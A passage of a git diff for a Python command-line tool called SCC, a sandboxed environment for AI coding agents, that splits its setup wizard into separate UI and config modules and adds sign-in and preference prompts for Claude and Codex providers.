is_selected = i == cursor - line = Text() - line.append(" ") - line.append(cursor_symbol if is_selected else " ", style="cyan" if is_selected else "") - line.append(" ") - line.append(label, style="bold white" if is_selected else "dim") - if tag: - padding = label_width - len(label) + (3 if tag_width else 2) - line.append(" " * max(2, padding)) - line.append(tag, style="cyan" if is_selected else "dim") - body.append_text(line) - body.append("\n") - if desc: - body.append(f" {desc}\n", style="dim") - - if i < len(options) - 1 and not metrics.tight_height: - body.append("\n") - - if not metrics.tight_height: - body.append("\n") - - hints = _build_hint_text( - [ - ("↑↓", "navigate"), - ("Enter", "confirm"), - ("Esc", "cancel"), - ] - ) - inner_width = ( - metrics.inner_width(padding_x=1, border=2) - if metrics.should_center and metrics.apply - else content_width - ) - separator_len = max(len(hints.plain), inner_width) - body.append(Borders.FOOTER_SEPARATOR * separator_len, style="dim") - body.append("\n") - body.append_text(hints) - - renderable: RenderableType = body - if metrics.apply and metrics.should_center: - renderable = Panel( - body, - border_style="bright_black", - box=box.ROUNDED, - padding=(0, 1), - width=metrics.content_width, - ) - - if metrics.apply: - renderable = apply_layout(renderable, metrics) - - return renderable - - with Live(_render_options(), console=console, auto_refresh=False, transient=True) as live: - while True: - key = readchar.readkey() - - if key in (readchar.key.UP, "k"): - cursor = (cursor - 1) % len(options) - live.update(_render_options(), refresh=True) - elif key in (readchar.key.DOWN, "j"): - cursor = (cursor + 1) % len(options) - live.update(_render_options(), refresh=True) - elif key in (readchar.key.ENTER, "\r", "\n"): - return cursor - elif key in (readchar.key.ESC, "q"): - return None - else: - continue - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Welcome Screen -# ═══════════════════════════════════════════════════════════════════════════════ - - -WELCOME_BANNER = """ -[cyan]╔═══════════════════════════════════════════════════════════╗[/cyan] -[cyan]║[/cyan] [cyan]║[/cyan] -[cyan]║[/cyan] [bold white]Welcome to SCC - Sandboxed Claude CLI[/bold white] [cyan]║[/cyan] -[cyan]║[/cyan] [cyan]║[/cyan] -[cyan]║[/cyan] [dim]Safe development environment for AI-assisted coding[/dim] [cyan]║[/cyan] -[cyan]║[/cyan] [cyan]║[/cyan] -[cyan]╚═══════════════════════════════════════════════════════════╝[/cyan] -""" - - -def show_welcome(console: Console) -> None: - """Display the welcome banner on the console.""" - console.print() - console.print(WELCOME_BANNER) - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Setup Header (TUI-style) -# ═══════════════════════════════════════════════════════════════════════════════ - - -SETUP_STEPS = ("Mode", "Org", "Auth", "Team", "Hooks", "Confirm") - - -def _append_dot_leader( - text: Text, - label: str, - value: str, - *, - width: int = 40, - label_style: str = "dim", - value_style: str = "white", -) -> None: - """Append a middle-dot leader line to a Text block.""" - label = label.strip() - value = value.strip() - gap = width - len(label) - len(value) - # Use middle dot · for cleaner aesthetic - dots = "·" * max(2, gap) - text.append(label, style=label_style) - text.append(f" {dots} ", style="dim") - text.append(value, style=value_style) - text.append("\n") - - -def _format_preview_value(value: str | None) -> str: - """Format preview value, using em-dash for unset.""" - if value is None or value == "": - return "—" # Em-dash for unset - return value - - -def _build_config_preview( - *, - org_url: str | None, - auth: str | None, - auth_header: str | None, - profile: str | None, - hooks_enabled: bool | None, - standalone: bool | None, -) -> Text: - """Build a dot-leader preview of the config that will be written.""" - preview = Text() - preview.append(str(config.CONFIG_FILE), style="dim") - preview.append("\n\n") - - mode_value = "standalone" if standalone else "organization" - _append_dot_leader(preview, "mode", mode_value, value_style="cyan") - - if not standalone: - _append_dot_leader( - preview, - "org.url", - _format_preview_value(org_url), - ) - _append_dot_leader( - preview, - "org.auth", - _format_preview_value(auth), - ) - if auth_header: - _append_dot_leader( - preview, - "org.auth_header", - _format_preview_value(auth_header), - ) - _append_dot_leader( - preview, - "profile", - _format_preview_value(profile), - ) - - if hooks_enabled is None: - hooks_display = "unset" - else: - hooks_display = "true" if hooks_enabled else "false" - _append_dot_leader(preview, "hooks.enabled", hooks_display) - _append_dot_leader( - preview, - "standalone", - "true" if standalone else "false", - ) - - return preview - - -def _build_proposed_config( - *, - org_url: str | None, - auth: str | None, - auth_header: str | None, - profile: str | None, - hooks_enabled: bool, - standalone: bool, -) -> dict[str, Any]: - """Build the config dict that will be written.""" - user_config: dict[str, Any] = { - "config_version": "1.0.0", - "hooks": {"enabled": hooks_enabled}, - } - - if standalone: - user_config["standalone"] = True - user_config["organization_source"] = None - elif org_url: - org_source: dict[str, Any] = { - "url": org_url, - "auth": auth, - } - if auth_header: - org_source["auth_header"] = auth_header - user_config["organization_source"] = org_source - user_config["selected_profile"] = profile - return user_config - - -def _get_config_value(cfg: dict[str, Any], key: str) -> str | None: - """Get a dotted-path value from config dict.""" - parts = key.split(".") - current: Any = cfg - for part in parts: - if not isinstance(current, dict) or part not in current: - return None - current = current[part] - if current is None: - return None - return str(current) - - -def _build_config_changes(before: dict[str, Any], after: dict[str, Any]) -> Text: - """Build a diff-style preview for config changes.""" - changes = Text() - keys = [ - "organization_source.url", - "organization_source.auth", - "organization_source.auth_header", - "selected_profile", - "hooks.enabled", - "standalone", - ] - - any_changes = False - for key in keys: - old = _get_config_value(before, key) - new = _get_config_value(after, key) - if old != new: - any_changes = True - changes.append(f"{key}\n", style="bold") - changes.append(f" - {old or 'unset'}\n", style="red") - changes.append(f" + {new or 'unset'}\n\n", style="green") - - if not any_changes: - changes.append("No changes detected.\n", style="dim") - return changes - - -def _render_setup_header(console: Console, *, step_index: int, subtitle: str | None = None) -> None: - """Render the setup step header with underline-style tabs.""" - console.clear() - - metrics = _layout_metrics(console) - content_width = metrics.content_width - - console.print() - _print_padded(console, Text("SCC Setup", style="bold white"), metrics) - if not metrics.tight_height: - console.print() - - tabs = Text() - underline = Text() - separator = " " - - for idx, step in enumerate(SETUP_STEPS): - if idx > 0: - tabs.append(separator) - underline.append(" " * len(separator)) - - is_active = idx == step_index - is_complete = idx < step_index - if is_active: - tab_style = "bold cyan" - elif is_complete: - tab_style = "green" - else: - tab_style = "dim" - - tabs.append(step, style=tab_style) - underline_segment = ( - Indicators.get("HORIZONTAL_LINE") * len(step) if is_active else " " * len(step) - ) - underline.append(underline_segment, style="cyan" if is_active else "dim") - - _print_padded(console, tabs, metrics) - _print_padded(console, underline, metrics) - - if not metrics.should_center: - separator_len = max(len(tabs.plain), content_width) - _print_padded(console, Borders.FOOTER_SEPARATOR * separator_len, metrics) - - if subtitle: - if not metrics.tight_height: - console.print() - _print_padded(console, f" {subtitle}", metrics) - console.print() - else: - console.print() - - -def _render_setup_layout( - console: Console, - *, - step_index: int, - subtitle: str | None, - left_title: str, - left_body: "Text | Table", - right_title: str, - right_body: "Text | Table", - footer_hint: str | None = None, -) -> None: - """Render a two-pane setup layout with a shared header.""" - _render_setup_header(console, step_index=step_index, subtitle=subtitle) - - metrics = _layout_metrics(console) - content_width = metrics.content_width - width = console.size.width - stacked_width = content_width - column_width = max(32, (content_width - 4) // 2) - - expand_panels = width >= 100 - - left_panel = Panel( - left_body, - title=f"[dim]{left_title}[/dim]", - border_style="bright_black", - padding=(0, 1), - box=box.ROUNDED, - width=stacked_width if width < 100 else column_width, - expand=expand_panels, - ) - right_panel = Panel( - right_body, - title=f"[dim]{right_title}[/dim]", - border_style="bright_black", - padding=(0, 1), - box=box.ROUNDED, - width=stacked_width if width < 100 else column_width, - expand=expand_panels, - ) - - if width < 100: - _print_padded(console, left_panel, metrics) - if not metrics.tight_height: - console.print() - _print_padded(console, right_panel, metrics) - else: - columns = Columns([left_panel, right_panel], expand=False, equal=True) - _print_padded(console, columns, metrics) - - console.print() - if footer_hint: - separator_len = max(len(footer_hint), content_width) - _print_padded(console, Borders.FOOTER_SEPARATOR * separator_len, metrics) - _print_padded(console, f" [dim]{footer_hint}[/dim]", metrics) - return - - hints = _build_hint_text( - [ - ("↑↓", "navigate"), - ("Enter", "confirm"), - ("Esc", "cancel"), - ] - ) - separator_len = max(len(hints.plain), content_width) - _print_padded(console, Borders.FOOTER_SEPARATOR * separator_len, metrics) - _print_padded(console, hints, metrics) +# ── Re-exports from setup_config.py (preserve test-patch targets) ─────────── +from .setup_config import ( # noqa: F401 + _append_dot_leader, + _build_config_changes, + _build_config_preview, + _build_proposed_config, + _build_setup_summary, + _confirm_setup, + _format_preview_value, + _get_config_value, + save_setup_config, +) +# ── Re-exports from setup_ui.py (preserve test-patch targets) ────────────── +from .setup_ui import ( # noqa: F401 + SETUP_STEPS, + WELCOME_BANNER, + _build_hint_text, + _layout_metrics, + _print_padded, + _render_setup_header, + _render_setup_layout, + _select_option, + show_welcome, +) +from .theme import Spinners +from .ui.prompts import confirm_with_layout, prompt_with_layout # noqa: F401 # ═══════════════════════════════════════════════════════════════════════════════ # Organization Config URL @@ -540,7 +130,7 @@ def prompt_auth_method(console: Console, *, rendered: bool = False) -> str | Non console.print() console.print("[dim]This is only used to fetch your organization config URL.[/dim]") console.print("[dim]If your config is private, SCC needs a token to download it.[/dim]") - console.print("[dim]This does not affect Claude auth inside the container.[/dim]") + console.print("[dim]This does not affect agent auth inside the container.[/dim]") console.print() console.print("[dim]How would you like to provide the token?[/dim]") console.print() @@ -729,59 +319,30 @@ def prompt_hooks_enablement(console: Console, *, rendered: bool = False) -> bool # ═══════════════════════════════════════════════════════════════════════════════ -# Save Configuration +# Setup Complete Display # ═══════════════════════════════════════════════════════════════════════════════ -def save_setup_config( - console: Console, - org_url: str | None, - auth: str | None, - auth_header: str | None, - profile: str | None, - hooks_enabled: bool, - standalone: bool = False, -) -> None: - """Save the setup configuration to the user config file. +def _three_tier_status(provider_id: str, auth_readiness: Any) -> str: + """Return three-tier readiness label for a provider. - Args: - console: Rich console for output - org_url: Organization config URL or None - auth: Auth spec or None - auth_header: Optional auth header for org fetch - profile: Selected profile name or None - hooks_enabled: Whether git hooks are enabled - standalone: Whether running in standalone mode + Three-tier vocabulary: 'launch-ready' (image + auth), 'auth cache present' + (auth ok, image missing), 'image available' (image ok, auth missing), + 'sign-in needed' (no auth, image status unknown). """ - # Ensure config directory exists - config.CONFIG_DIR.mkdir(parents=True, exist_ok=True) - - # Build configuration - user_config: dict[str, Any] = { - "config_version": "1.0.0", - "hooks": {"enabled": hooks_enabled}, - } - - if standalone: - user_config["standalone"] = True - user_config["organization_source"] = None - elif org_url: - org_source: dict[str, Any] = { - "url": org_url, - "auth": auth, - } - if auth_header: - org_source["auth_header"] = auth_header - user_config["organization_source"] = org_source - user_config["selected_profile"] = profile - - # Save to config file - config.save_user_config(user_config) + from .commands.launch.preflight import ImageStatus, _check_image_available + has_auth = auth_readiness is not None and auth_readiness.status == "present" + image_status = _check_image_available(provider_id) + has_image = image_status == ImageStatus.AVAILABLE -# ═══════════════════════════════════════════════════════════════════════════════ -# Setup Complete Display -# ═══════════════════════════════════════════════════════════════════════════════ + if has_auth and has_image: + return "launch-ready" + if has_auth and not has_image: + return "auth cache present" + if not has_auth and has_image: + return "image available" + return "sign-in needed" def show_setup_complete( @@ -789,6 +350,8 @@ def show_setup_complete( org_name: str | None = None, profile: str | None = None, standalone: bool = False, + provider_readiness: dict[str, Any] | None = None, + provider_preference: str | None = None, ) -> None: """Display the setup completion message. @@ -818,6 +381,28 @@ def show_setup_complete( _append_dot_leader(content, "profile", profile or "none", value_style="white") _append_dot_leader(content, "config", str(config.CONFIG_DIR), value_style="cyan") + if provider_readiness is not None: + claude_ready = provider_readiness.get("claude") + codex_ready = provider_readiness.get("codex") + _append_dot_leader( + content, + "claude", + _three_tier_status("claude", claude_ready), + value_style="white", + ) + _append_dot_leader( + content, + "codex", + _three_tier_status("codex", codex_ready), + value_style="white", + ) + if provider_preference is not None: + preference_label = { + "ask": "ask every time", + "claude": "prefer Claude Code", + "codex": "prefer Codex", + }.get(provider_preference, provider_preference) + _append_dot_leader(content, "startup", preference_label, value_style="white") # Main panel main_panel = Panel( @@ -837,7 +422,7 @@ def show_setup_complete( console.print() _print_padded( console, - " [cyan]scc start ~/project[/cyan] [dim]Launch Claude in a workspace[/dim]", + " [cyan]scc start ~/project[/cyan] [dim]Launch agent in a workspace[/dim]", metrics, ) _print_padded( @@ -850,82 +435,175 @@ def show_setup_complete( " [cyan]scc doctor[/cyan] [dim]Check system health[/dim]", metrics, ) + _print_padded( + console, + " [cyan]scc provider show[/cyan] [dim]Show current provider preference[/dim]", + metrics, + ) + _print_padded( + console, + " [cyan]scc provider set[/cyan] [dim]Set preference (ask|claude|codex)[/dim]", + metrics, + ) console.print() -def _build_setup_summary( - *, - org_url: str | None, - auth: str | None, - auth_header: str | None, - profile: str | None, - hooks_enabled: bool, - standalone: bool, - org_name: str | None = None, -) -> Text: - """Build a summary text block for setup confirmation.""" - summary = Text() +def _render_provider_status(readiness: dict[str, Any]) -> Table: + """Build a provider connection status table.""" + table = Table.grid(padding=(0, 2)) + table.add_column(style="cyan", no_wrap=True) + table.add_column(style="white", no_wrap=True) + table.add_column(style="dim") - def _line(label: str, value: str) -> None: - summary.append(f"{label}: ", style="cyan") - summary.append(value, style="white") - summary.append("\n") + for provider_id in ("claude", "codex"): + state = readiness.get(provider_id) + status = _three_tier_status(provider_id, state) + guidance = state.guidance if state is not None else "unavailable" + table.add_row(get_provider_display_name(provider_id), status, guidance) + return table - if standalone: - _line("Mode", "Standalone") - else: - _line("Mode", "Organization") - if org_name: - _line("Organization", org_name) - if org_url: - _line("Org URL", org_url) - _line("Profile", profile or "none") - _line("Auth", auth or "none") - if auth_header: - _line("Auth Header", auth_header) - - _line("Hooks", "enabled" if hooks_enabled else "disabled") - _line("Config dir", str(config.CONFIG_DIR)) - return summary - - -def _confirm_setup( - console: Console, - *, - org_url: str | None, - auth: str | None, - auth_header: str | None = None, - profile: str | None, - hooks_enabled: bool, - standalone: bool, - org_name: str | None = None, - rendered: bool = False, -) -> bool: - """Show a configuration summary and ask for confirmation.""" - summary = _build_setup_summary( - org_url=org_url, - auth=auth, - auth_header=auth_header, - profile=profile, - hooks_enabled=hooks_enabled, - standalone=standalone, - org_name=org_name, + +def _prompt_provider_connections(console: Console, readiness: dict[str, Any]) -> tuple[str, ...]: + """Prompt for provider onboarding choices during setup.""" + missing = tuple( + provider_id + for provider_id in ("claude", "codex") + if readiness.get(provider_id) is None or readiness[provider_id].status != "present" ) + if not missing: + return () + + options: list[tuple[str, str, str]] = [] + if len(missing) == 2: + options.append( + ( + "Connect both", + "recommended", + "Authenticate Claude first, then Codex, and reuse both later.", + ) + ) + for provider_id in missing: + options.append( + ( + f"Connect {get_provider_display_name(provider_id)}", + "browser", + f"Authenticate {get_provider_display_name(provider_id)} now.", + ) + ) + options.append(("Skip for now", "", "You can connect a provider later during start.")) - if not rendered: - metrics = _layout_metrics(console) - panel = Panel( - summary, - title="[bold cyan]Review & Confirm[/bold cyan]", + console.print() + _print_padded( + console, + Panel( + _render_provider_status(readiness), + title="[bold cyan]Connect Coding Agents[/bold cyan]", + subtitle=( + "Connect Claude, Codex, or both now so future starts reuse the saved auth cache." + ), border_style="bright_black", box=box.ROUNDED, - padding=(1, 2), - width=min(metrics.content_width, 80), + padding=(0, 1), + ), + _layout_metrics(console), + ) + console.print() + + selected = _select_option(console, options, default=0) + if selected is None: + return () + + label = options[selected][0] + if label == "Skip for now": + return () + if label == "Connect both": + return ("claude", "codex") + if "Claude" in label: + return ("claude",) + return ("codex",) + + +def _prompt_provider_preference(console: Console, current: str | None) -> str | None: + """Prompt for how SCC should behave when both providers are connected.""" + options = [ + ("Ask me when both are available", "default", "Choose at start time when needed."), + ("Prefer Claude Code", "", "Use Claude automatically unless you override it."), + ("Prefer Codex", "", "Use Codex automatically unless you override it."), + ] + default_index = 0 + if current == "claude": + default_index = 1 + elif current == "codex": + default_index = 2 + + console.print() + selected = _select_option(console, options, default=default_index) + if selected is None: + return current + if selected == 0: + return "ask" + if selected == 1: + return "claude" + return "codex" + + +def _run_provider_onboarding(console: Console) -> tuple[dict[str, Any] | None, str | None]: + """Offer one-time provider sign-in during setup.""" + adapters = get_default_adapters() + try: + adapters.sandbox_runtime.ensure_available() + except Exception: + console.print() + console.print( + "[dim]Provider sign-in skipped during setup because Docker is not available yet.[/dim]" + ) + return None, config.get_selected_provider() + + readiness = collect_provider_readiness(adapters) + sequence = _prompt_provider_connections(console, readiness) + + for provider_id in sequence: + display_name = get_provider_display_name(provider_id) + console.print() + _print_padded( + console, + create_info_panel( + f"Connecting {display_name}", + f"SCC will open the normal {display_name} sign-in flow now.", + "When sign-in completes, the auth cache will be reused on future starts.", + ), + _layout_metrics(console), ) - _print_padded(console, panel, metrics) console.print() + provider_adapter = get_agent_provider(adapters, provider_id) + if provider_adapter is None: + continue + try: + provider_adapter.bootstrap_auth() + except ProviderNotReadyError as exc: + console.print() + _print_padded( + console, + create_info_panel( + f"{display_name} sign-in incomplete", + exc.user_message, + exc.suggested_action + or "You can retry the provider sign-in later during start.", + ), + _layout_metrics(console), + ) + console.print() - return confirm_with_layout(console, "[cyan]Apply these settings?[/cyan]", default=True) + refreshed = collect_provider_readiness(adapters) + selected_preference = config.get_selected_provider() + if all( + refreshed.get(provider_id) is not None and refreshed[provider_id].status == "present" + for provider_id in ("claude", "codex") + ): + preference = _prompt_provider_preference(console, config.get_selected_provider()) + config.set_selected_provider(preference) + selected_preference = preference + return refreshed, selected_preference # ═══════════════════════════════════════════════════════════════════════════════ @@ -1185,11 +863,24 @@ def run_setup_wizard(console: Console) -> bool: standalone=standalone, ) + provider_readiness, provider_preference = _run_provider_onboarding(console) + # Complete if standalone: - show_setup_complete(console, standalone=True) + show_setup_complete( + console, + standalone=True, + provider_readiness=provider_readiness, + provider_preference=provider_preference, + ) else: - show_setup_complete(console, org_name=org_name, profile=profile) + show_setup_complete( + console, + org_name=org_name, + profile=profile, + provider_readiness=provider_readiness, + provider_preference=provider_preference, + ) return True @@ -1268,8 +959,16 @@ def run_non_interactive_setup( hooks_enabled=True, # Default to enabled for non-interactive ) + provider_readiness, provider_preference = _run_provider_onboarding(console) + org_name = org_config.get("organization", {}).get("name") - show_setup_complete(console, org_name=org_name, profile=team) + show_setup_complete( + console, + org_name=org_name, + profile=team, + provider_readiness=provider_readiness, + provider_preference=provider_preference, + ) return True diff --git a/src/scc_cli/setup_config.py b/src/scc_cli/setup_config.py new file mode 100644 index 0000000..942dfea --- /dev/null +++ b/src/scc_cli/setup_config.py @@ -0,0 +1,310 @@ +""" +Configuration building, preview, and persistence for the SCC setup wizard. + +Extracted from setup.py to reduce module size. +Contains: config preview rendering, proposed config assembly, config diff, +save logic, setup summary, and confirmation flow. +""" + +from typing import Any + +from rich import box +from rich.console import Console +from rich.panel import Panel +from rich.text import Text + +from . import config +from .setup_ui import _layout_metrics, _print_padded +from .ui.prompts import confirm_with_layout + +# ═══════════════════════════════════════════════════════════════════════════════ +# Config Preview Helpers +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _append_dot_leader( + text: Text, + label: str, + value: str, + *, + width: int = 40, + label_style: str = "dim", + value_style: str = "white", +) -> None: + """Append a middle-dot leader line to a Text block.""" + label = label.strip() + value = value.strip() + gap = width - len(label) - len(value) + # Use middle dot · for cleaner aesthetic + dots = "·" * max(2, gap) + text.append(label, style=label_style) + text.append(f" {dots} ", style="dim") + text.append(value, style=value_style) + text.append("\n") + + +def _format_preview_value(value: str | None) -> str: + """Format preview value, using em-dash for unset.""" + if value is None or value == "": + return "—" # Em-dash for unset + return value + + +def _build_config_preview( + *, + org_url: str | None, + auth: str | None, + auth_header: str | None, + profile: str | None, + hooks_enabled: bool | None, + standalone: bool | None, +) -> Text: + """Build a dot-leader preview of the config that will be written.""" + preview = Text() + preview.append(str(config.CONFIG_FILE), style="dim") + preview.append("\n\n") + + mode_value = "standalone" if standalone else "organization" + _append_dot_leader(preview, "mode", mode_value, value_style="cyan") + + if not standalone: + _append_dot_leader( + preview, + "org.url", + _format_preview_value(org_url), + ) + _append_dot_leader( + preview, + "org.auth", + _format_preview_value(auth), + ) + if auth_header: + _append_dot_leader( + preview, + "org.auth_header", + _format_preview_value(auth_header), + ) + _append_dot_leader( + preview, + "profile", + _format_preview_value(profile), + ) + + if hooks_enabled is None: + hooks_display = "unset" + else: + hooks_display = "true" if hooks_enabled else "false" + _append_dot_leader(preview, "hooks.enabled", hooks_display) + _append_dot_leader( + preview, + "standalone", + "true" if standalone else "false", + ) + + return preview + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Proposed Config Assembly +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _build_proposed_config( + *, + org_url: str | None, + auth: str | None, + auth_header: str | None, + profile: str | None, + hooks_enabled: bool, + standalone: bool, +) -> dict[str, Any]: + """Build the config dict that will be written.""" + user_config: dict[str, Any] = { + "config_version": "1.0.0", + "hooks": {"enabled": hooks_enabled}, + } + + if standalone: + user_config["standalone"] = True + user_config["organization_source"] = None + elif org_url: + org_source: dict[str, Any] = { + "url": org_url, + "auth": auth, + } + if auth_header: + org_source["auth_header"] = auth_header + user_config["organization_source"] = org_source + user_config["selected_profile"] = profile + return user_config + + +def _get_config_value(cfg: dict[str, Any], key: str) -> str | None: + """Get a dotted-path value from config dict.""" + parts = key.split(".") + current: Any = cfg + for part in parts: + if not isinstance(current, dict) or part not in current: + return None + current = current[part] + if current is None: + return None + return str(current) + + +def _build_config_changes(before: dict[str, Any], after: dict[str, Any]) -> Text: + """Build a diff-style preview for config changes.""" + changes = Text() + keys = [ + "organization_source.url", + "organization_source.auth", + "organization_source.auth_header", + "selected_profile", + "hooks.enabled", + "standalone", + ] + + any_changes = False + for key in keys: + old = _get_config_value(before, key) + new = _get_config_value(after, key) + if old != new: + any_changes = True + changes.append(f"{key}\n", style="bold") + changes.append(f" - {old or 'unset'}\n", style="red") + changes.append(f" + {new or 'unset'}\n\n", style="green") + + if not any_changes: + changes.append("No changes detected.\n", style="dim") + return changes + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Save Configuration +# ═══════════════════════════════════════════════════════════════════════════════ + + +def save_setup_config( + console: Console, + org_url: str | None, + auth: str | None, + auth_header: str | None, + profile: str | None, + hooks_enabled: bool, + standalone: bool = False, +) -> None: + """Save the setup configuration to the user config file. + + Args: + console: Rich console for output + org_url: Organization config URL or None + auth: Auth spec or None + auth_header: Optional auth header for org fetch + profile: Selected profile name or None + hooks_enabled: Whether git hooks are enabled + standalone: Whether running in standalone mode + """ + # Ensure config directory exists + config.CONFIG_DIR.mkdir(parents=True, exist_ok=True) + + # Build configuration + user_config: dict[str, Any] = { + "config_version": "1.0.0", + "hooks": {"enabled": hooks_enabled}, + } + + if standalone: + user_config["standalone"] = True + user_config["organization_source"] = None + elif org_url: + org_source: dict[str, Any] = { + "url": org_url, + "auth": auth, + } + if auth_header: + org_source["auth_header"] = auth_header + user_config["organization_source"] = org_source + user_config["selected_profile"] = profile + + # Save to config file + config.save_user_config(user_config) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Setup Summary & Confirmation +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _build_setup_summary( + *, + org_url: str | None, + auth: str | None, + auth_header: str | None, + profile: str | None, + hooks_enabled: bool, + standalone: bool, + org_name: str | None = None, +) -> Text: + """Build a summary text block for setup confirmation.""" + summary = Text() + + def _line(label: str, value: str) -> None: + summary.append(f"{label}: ", style="cyan") + summary.append(value, style="white") + summary.append("\n") + + if standalone: + _line("Mode", "Standalone") + else: + _line("Mode", "Organization") + if org_name: + _line("Organization", org_name) + if org_url: + _line("Org URL", org_url) + _line("Profile", profile or "none") + _line("Auth", auth or "none") + if auth_header: + _line("Auth Header", auth_header) + + _line("Hooks", "enabled" if hooks_enabled else "disabled") + _line("Config dir", str(config.CONFIG_DIR)) + return summary + + +def _confirm_setup( + console: Console, + *, + org_url: str | None, + auth: str | None, + auth_header: str | None = None, + profile: str | None, + hooks_enabled: bool, + standalone: bool, + org_name: str | None = None, + rendered: bool = False, +) -> bool: + """Show a configuration summary and ask for confirmation.""" + summary = _build_setup_summary( + org_url=org_url, + auth=auth, + auth_header=auth_header, + profile=profile, + hooks_enabled=hooks_enabled, + standalone=standalone, + org_name=org_name, + ) + + if not rendered: + metrics = _layout_metrics(console) + panel = Panel( + summary, + title="[bold cyan]Review & Confirm[/bold cyan]", + border_style="bright_black", + box=box.ROUNDED, + padding=(1, 2), + width=min(metrics.content_width, 80), + ) + _print_padded(console, panel, metrics) + console.print() + + return confirm_with_layout(console, "[cyan]Apply these settings?[/cyan]", default=True) diff --git a/src/scc_cli/setup_ui.py b/src/scc_cli/setup_ui.py new file mode 100644 index 0000000..9778471 --- /dev/null +++ b/src/scc_cli/setup_ui.py @@ -0,0 +1,303 @@ +""" +TUI rendering components for the SCC setup wizard. + +Extracted from setup.py to reduce module size. +Contains: arrow-key selection, welcome banner, step headers, two-pane layouts. +""" + +import readchar +from rich import box +from rich.columns import Columns +from rich.console import Console, RenderableType +from rich.live import Live +from rich.panel import Panel +from rich.table import Table +from rich.text import Text + +from .theme import Borders, Indicators +from .ui.chrome import LayoutMetrics, apply_layout, get_layout_metrics, print_with_layout + +# ═══════════════════════════════════════════════════════════════════════════════ +# Layout Helpers +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _layout_metrics(console: Console) -> LayoutMetrics: + """Return layout metrics for setup rendering.""" + return get_layout_metrics(console, max_width=104) + + +def _print_padded(console: Console, renderable: RenderableType, metrics: LayoutMetrics) -> None: + """Print with layout padding when applicable.""" + print_with_layout(console, renderable, metrics=metrics, constrain=True) + + +def _build_hint_text(hints: list[tuple[str, str]]) -> Text: + """Build a compact hint line with middot separators.""" + text = Text() + for index, (key, action) in enumerate(hints): + if index > 0: + text.append(" · ", style="dim") + text.append(key, style="cyan bold") + text.append(" ", style="dim") + text.append(action, style="dim") + return text + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Arrow-Key Selection Component +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _select_option( + console: Console, + options: list[tuple[str, str, str]], + *, + default: int = 0, +) -> int | None: + """Interactive arrow-key selection for setup options. + + Args: + console: Rich console for output. + options: List of (label, tag, description) tuples. + default: Default selected index. + + Returns: + Selected index (0-based), or None if cancelled. + """ + cursor = default + cursor_symbol = Indicators.get("CURSOR") + + def _render_options() -> RenderableType: + """Render options for the live picker.""" + metrics = _layout_metrics(console) + content_width = metrics.content_width + min_label_width = min(36, max(24, content_width // 3)) + label_width = max(min_label_width, max((len(label) for label, _, _ in options), default=0)) + tag_width = max((len(tag) for _, tag, _ in options), default=0) + + body = Text() + if not metrics.tight_height: + body.append("\n") + + for i, (label, tag, desc) in enumerate(options): + is_selected = i == cursor + line = Text() + line.append(" ") + line.append(cursor_symbol if is_selected else " ", style="cyan" if is_selected else "") + line.append(" ") + line.append(label, style="bold white" if is_selected else "dim") + if tag: + padding = label_width - len(label) + (3 if tag_width else 2) + line.append(" " * max(2, padding)) + line.append(tag, style="cyan" if is_selected else "dim") + body.append_text(line) + body.append("\n") + if desc: + body.append(f" {desc}\n", style="dim") + + if i < len(options) - 1 and not metrics.tight_height: + body.append("\n") + + if not metrics.tight_height: + body.append("\n") + + hints = _build_hint_text( + [ + ("↑↓", "navigate"), + ("Enter", "confirm"), + ("Esc", "cancel"), + ] + ) + inner_width = ( + metrics.inner_width(padding_x=1, border=2) + if metrics.should_center and metrics.apply + else content_width + ) + separator_len = max(len(hints.plain), inner_width) + body.append(Borders.FOOTER_SEPARATOR * separator_len, style="dim") + body.append("\n") + body.append_text(hints) + + renderable: RenderableType = body + if metrics.apply and metrics.should_center: + renderable = Panel( + body, + border_style="bright_black", + box=box.ROUNDED, + padding=(0, 1), + width=metrics.content_width, + ) + + if metrics.apply: + renderable = apply_layout(renderable, metrics) + + return renderable + + with Live(_render_options(), console=console, auto_refresh=False, transient=True) as live: + while True: + key = readchar.readkey() + + if key in (readchar.key.UP, "k"): + cursor = (cursor - 1) % len(options) + live.update(_render_options(), refresh=True) + elif key in (readchar.key.DOWN, "j"): + cursor = (cursor + 1) % len(options) + live.update(_render_options(), refresh=True) + elif key in (readchar.key.ENTER, "\r", "\n"): + return cursor + elif key in (readchar.key.ESC, "q"): + return None + else: + continue + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Welcome Screen +# ═══════════════════════════════════════════════════════════════════════════════ + + +WELCOME_BANNER = """ +[cyan]╔═══════════════════════════════════════════════════════════╗[/cyan] +[cyan]║[/cyan] [cyan]║[/cyan] +[cyan]║[/cyan] [bold white]Welcome to SCC - Sandboxed Coding CLI[/bold white] [cyan]║[/cyan] +[cyan]║[/cyan] [cyan]║[/cyan] +[cyan]║[/cyan] [dim]Safe development environment for AI-assisted coding[/dim] [cyan]║[/cyan] +[cyan]║[/cyan] [cyan]║[/cyan] +[cyan]╚═══════════════════════════════════════════════════════════╝[/cyan] +""" + + +def show_welcome(console: Console) -> None: + """Display the welcome banner on the console.""" + console.print() + console.print(WELCOME_BANNER) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Setup Header (TUI-style) +# ═══════════════════════════════════════════════════════════════════════════════ + + +SETUP_STEPS = ("Mode", "Org", "Auth", "Team", "Hooks", "Confirm") + + +def _render_setup_header(console: Console, *, step_index: int, subtitle: str | None = None) -> None: + """Render the setup step header with underline-style tabs.""" + console.clear() + + metrics = _layout_metrics(console) + content_width = metrics.content_width + + console.print() + _print_padded(console, Text("SCC Setup", style="bold white"), metrics) + if not metrics.tight_height: + console.print() + + tabs = Text() + underline = Text() + separator = " " + + for idx, step in enumerate(SETUP_STEPS): + if idx > 0: + tabs.append(separator) + underline.append(" " * len(separator)) + + is_active = idx == step_index + is_complete = idx < step_index + if is_active: + tab_style = "bold cyan" + elif is_complete: + tab_style = "green" + else: + tab_style = "dim" + + tabs.append(step, style=tab_style) + underline_segment = ( + Indicators.get("HORIZONTAL_LINE") * len(step) if is_active else " " * len(step) + ) 